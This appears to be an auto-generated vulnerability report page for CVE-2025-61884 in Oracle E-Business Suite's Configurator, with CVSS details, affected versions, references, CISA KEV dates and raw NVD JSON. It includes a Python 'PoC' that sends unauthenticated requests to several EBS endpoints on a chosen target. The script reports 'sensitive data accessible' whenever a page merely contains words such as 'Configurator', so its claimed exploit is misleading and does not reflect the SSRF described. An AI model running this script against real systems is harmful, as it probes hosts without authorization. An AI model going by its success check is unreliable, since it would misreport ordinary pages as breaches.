Security Vulnerability Report
CVE-2025-61884 CVSS 7.5 HIGH

CVE-2025-61884

Published: 2025-10-12 03:15:35
Last Modified: 2025-10-27 17:08:49

Description

Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Configurator accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite 12.2.3
Oracle E-Business Suite 12.2.4
Oracle E-Business Suite 12.2.5
Oracle E-Business Suite 12.2.6
Oracle E-Business Suite 12.2.7
Oracle E-Business Suite 12.2.8
Oracle E-Business Suite 12.2.9
Oracle E-Business Suite 12.2.10
Oracle E-Business Suite 12.2.11
Oracle E-Business Suite 12.2.12
Oracle E-Business Suite 12.2.13
Oracle E-Business Suite 12.2.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61884 PoC - Oracle Configurator Unauthenticated Data Access
# Vulnerability: Unauthenticated access to critical data via Runtime UI
# Affected: Oracle E-Business Suite 12.2.3 - 12.2.14
import sys

import requests
import urllib3

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-ebs.example.com"
CONFIGURATOR_PATH = "/OA_HTML/configurator/UiServlet"


def exploit_cve_2025_61884(target_url):
    """
    Exploit unauthenticated data access in Oracle Configurator Runtime UI.
    The vulnerability allows reading sensitive configuration data without
    authentication.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Connection": "close",
    }

    # Step 1: Access Configurator Runtime UI endpoint directly without authentication
    endpoints = [
        f"{target_url}{CONFIGURATOR_PATH}",
        f"{target_url}/OA_HTML/jtflogin.jsp",
        f"{target_url}/configurator/runtime/",
        f"{target_url}/OA_HTML/cfg/",
    ]

    for endpoint in endpoints:
        try:
            print(f"[*] Probing: {endpoint}")
            response = requests.get(
                endpoint,
                headers=headers,
                verify=False,
                timeout=10,
                allow_redirects=False,
            )

            # Check for successful access or sensitive data leakage
            if response.status_code == 200:
                indicators = [
                    "Configurator",
                    "Runtime UI",
                    "Configuration",
                    "Oracle E-Business",
                ]
                for indicator in indicators:
                    if indicator.lower() in response.text.lower():
                        print(f"[+] Sensitive data accessible at: {endpoint}")
                        print(f"[+] Response snippet: {response.text[:500]}")
                        return True
            elif response.status_code == 403:
                print(f"[-] Access denied: {endpoint}")
            else:
                print(f"[*] Status {response.status_code}: {endpoint}")

        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")

    return False


if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    print("[*] CVE-2025-61884 Oracle Configurator Data Access PoC")
    print(f"[*] Target: {TARGET_URL}")
    exploit_cve_2025_61884(TARGET_URL)
```

References

https://www.oracle.com/security-alerts/alert-cve-2025-61884.html (Vendor Advisory)
https://blogs.oracle.com/security/post/apply-july-2025-cpu (Vendor Advisory)
https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/ (Exploit, Press/Media Coverage)
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61884 (US Government Resource)

CISA KEV: added 2025-10-20, action due 2025-11-10. Required action: apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-61884",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-12T03:15:34.720",
    "lastModified": "2025-10-27T17:08:49.037",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Configurator accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "cisaExploitAdd": "2025-10-20",
    "cisaActionDue": "2025-11-10",
    "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
    "cisaVulnerabilityName": "Oracle E-Business Suite Server-Side Request Forgery (SSRF) Vulnerability",
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-22"},
          {"lang": "en", "value": "CWE-93"},
          {"lang": "en", "value": "CWE-287"},
          {"lang": "en", "value": "CWE-444"},
          {"lang": "en", "value": "CWE-501"},
          {"lang": "en", "value": "CWE-918"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "12.2.3",
                "versionEndIncluding": "12.2.14",
                "matchCriteriaId": "5CC0EA09-3974-4A14-8724-27020AECB5A8"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.oracle.com/security-alerts/alert-cve-2025-61884.html",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://blogs.oracle.com/security/post/apply-july-2025-cpu",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Press/Media Coverage"]
      },
      {
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61884",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["US Government Resource"]
      }
    ]
  }
}
```